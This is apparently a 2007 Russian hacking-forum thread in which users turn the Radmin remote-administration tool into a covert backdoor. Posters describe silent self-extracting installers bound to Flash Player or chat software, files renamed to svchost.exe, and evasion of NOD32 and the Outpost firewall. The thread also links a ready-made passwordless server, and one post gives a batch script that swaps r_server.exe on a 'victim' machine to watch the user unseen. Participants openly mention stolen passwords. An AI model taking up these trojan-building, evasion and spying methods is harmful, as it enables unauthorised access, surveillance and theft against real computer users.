Mega FAQ по Radmin'у

Discussion in 'Soft - Windows' started by Elekt, 29 Jan 2006.

  1. Derick

    Derick New Member

    Joined:
    9 Mar 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Да кстати как поменять пароль и порт ?
    Че то я спрашивал не кто не отвечает!
     
  2. Stern

    Stern Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    75
    Likes Received:
    5
    Reputations:
    0
    Да я сам незнаю.....если чесно.....;(


    кто может привести пример Sfx архива??? с уже готовым радмином для впаривания...
     
  3. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Параметры SFX-архива:
    Состав архива:
    Содержимое run.cmd:
    P.S. Забирайте готовый сервер Радмина (стандартный порт, без пароля версия 2.2): http://lebed.ucoz.ru/soft/RA.zip
     
    #63 -=lebed=-, 16 Mar 2007
    Last edited: 16 Mar 2007
  4. Stern

    Stern Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    75
    Likes Received:
    5
    Reputations:
    0
    такс....теперь помогите еще разок..;) у меня есть все сделанное по FAQ в самом начале...т.е.

    AdmDll.dll
    111.reg
    r_server.exe
    raddrv.dll
    111.bat
    DEL.bat


    => мне надо еще создать фаил run.cmd с содержимым

    и все?
     
  5. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Да, не, мона bat, можно cmd (cmd - тока на XP, батник на любой винде будет работать),
    содержимое, то что я написал, можешь делать как Elekt написал, я же выложил готовый - распакуй его winrar`ом в любую папку и посмотри...
     
  6. Stern

    Stern Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    75
    Likes Received:
    5
    Reputations:
    0
    а...т.е......мона скачать архив #4 и просто его в sfx и прописать коментарий

    ???

    и при его запуске типа "не чё не произойдет" но сервак радмина будет установлен..?
     
  7. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Окошко банкика, имхо мелькнуть может (в прочем как и cmd)
     
  8. Stern

    Stern Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    75
    Likes Received:
    5
    Reputations:
    0
    хыхыК получилось..;) тока что челу закинул;))) а склеил его с флэшплеером)))))
     
  9. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    А подключится к нему, получилось?
     
  10. Derick

    Derick New Member

    Joined:
    9 Mar 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    "Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce, 1a
    "Port"=hex:23,13,00,00
    Но все таки что мне надо изменить в этих строчках чтоб пароль и порт поменять ?
    Или скажите где есть инфа по реестру ну про его кодирование !
     
  11. Derick

    Derick New Member

    Joined:
    9 Mar 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Все я сам разобрался и с портом как менять и паролем !)
     
  12. Prodi

    Prodi New Member

    Joined:
    22 Mar 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Тема супер!
    -И антивирусом (в часности NOD32 ) не палится, как было сказано в посте ...
    -Доработал под себя, получился не плохой наборчик, всего из 4-х файлоф ...
    svchost.exe (убрана иконка, которая настораживала своим видом когда в списке висят штук 8 svchost -ов и один из них ЧЁРНЫЙ ... )
    set_time.bat (ранее знакомый нам как 111.bat но включающий в себя и команды reg add и заметания следов del всех перечисленных фалов, после их проработки :)
    raddrv.dll (убрана подпись о том что она пренадлежит Remote Administrator)
    AdmDll.dll

    -Следующим этапом, буду клееть с Anti-Vypress-Chat -Который пользуется большой популярностью в наших локалках ...

    -Есть одна только проблема:
    Виндовозовский брадмауер, чётко обошли ... ;)
    А как быть с OutPost-ом :p
    Пробовал создавать правило "исключение" для данного процесса (в OutPost) -ну типа -"разрешить данному приложению всё" ...
    Затем сравнивал снимки реестра (TotallUninstall-ером), сделаные до, и после разрешения, (были изменения в некоторых его ветвях...) Но после "икуственного" импортирования этих пааметров, посредством bat-ника ну или файла.reg
    -OutPost не принимает его в исключения (разрешённые программы) :confused:

    -Может есть у кого, какие соображения на данную тему?
     
  13. Vikemess

    Vikemess New Member

    Joined:
    25 Dec 2006
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Народ, подскажите. Есть файл, склееный клеем SuperGlue, но он распознается как вирус. Чем его можно закриптовать, чтобы он не палился? )
     
  14. P-29

    P-29 New Member

    Joined:
    4 Aug 2006
    Messages:
    47
    Likes Received:
    0
    Reputations:
    0
    Кто может выложить файлы от радмина raddrv.dll, AdmDll.dll не поляшийся nod32 ато они уменя уже палиться :(.
     
  15. Prodi

    Prodi New Member

    Joined:
    22 Mar 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Не вижу обходимости выкладывать ... поскольку, установив Radmin, ты найдёшь в его папке, всё что ты ищешь ;-)

    - Чтож за NOD у тебя такой? :rolleyes:
    У меня NOD32 c версией баз 2144 от 25 марта и них... не палит .... :cool:
     
  16. Derick

    Derick New Member

    Joined:
    9 Mar 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    У меня каждый день обновления на нод ,но тоже не палит ! Он палит только когда глубокий анализ делаешь , а так даже при запуске палит ? ха
    Спс за эту инструкцию автору ! Наугарался я и пароли крал ,но че-то быстро надоедает так угарать !
     
  17. BrutAino

    BrutAino New Member

    Joined:
    28 Feb 2007
    Messages:
    19
    Likes Received:
    4
    Reputations:
    -2
    Проблема....

    У жертвы динамический ip, как сделать так, чтобы при выходе её в онлайн мне отсылался её новый адрес :rolleyes:
     
    #77 BrutAino, 3 Apr 2007
    Last edited: 3 Apr 2007
  18. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    установить у жертвы соответствующий софт. но в паблике я не припомню такого, в принципе такая прожка недолго пишется. метод для ленивых: сканить пул жертвы на открытый радмин порт =)
     
  19. P-29

    P-29 New Member

    Joined:
    4 Aug 2006
    Messages:
    47
    Likes Received:
    0
    Reputations:
    0
    У меня с версий 2176 и палит без в сякого глубокава анализа, ранше да тока с глубоким палил.
     
  20. dmn

    dmn Elder - Старейшина

    Joined:
    10 Dec 2006
    Messages:
    37
    Likes Received:
    8
    Reputations:
    0
    Помогите доработать способ подмены настоящего файла радмины на поддельный, чтоб не пропалили.
    Вобщем забацал я сервак радмина так что он при любом подключении синего цвета и даже если на него нажать он все равно пишет Нет соединений. Теперь надо подменить реальный на мой. Я делал так:

    taskkill /im r_server.exe /f
    del C:\WINDOWS\system32\r_server.exe
    .
    .
    {эту строку я продублировал 100 раз}
    .
    .
    del C:\WINDOWS\system32\r_server.exe
    copy /y "r_server.exe" "%SYSTEMROOT%\system32\r_server.exe"
    "%SYSTEMROOT%\system32\r_server.exe" /start
    del C:\r_server.exe
    del C:\start.bat

    Затем сохраняю его с именем start.bat, пакую батник и мой файл сервака винраром в sfx. При упаковке настраиваю чтоб распаковывался на диск С. Ставлю галочку Скрывать все и перезаписывать существующие фалы.
    Остается только приконектится к жертве через телнет и перепись файлов (ПРИ ЭТИХ ПОДКЛЮЧЕНИЯХ ЦВЕТ ИКОНКИ РАДИНА НЕ МЕНЯЕТСЯ). Закидываю файл, запускаю и отсоединяюсь. Через секунд 15 обратно присоединяюсь через Перепись файлов и снова копирую файл r_server.exe чтобы проверить подменился он или нет. Если это мой то все олично. Отключаю звук при подключении и можно смело наблюдать за действиями пользователя. Всегда когда я так делал все работало, НО на одном компе это не проходит. Не могу понять почему. Может кто подскажет как усовершенствовать этот метод?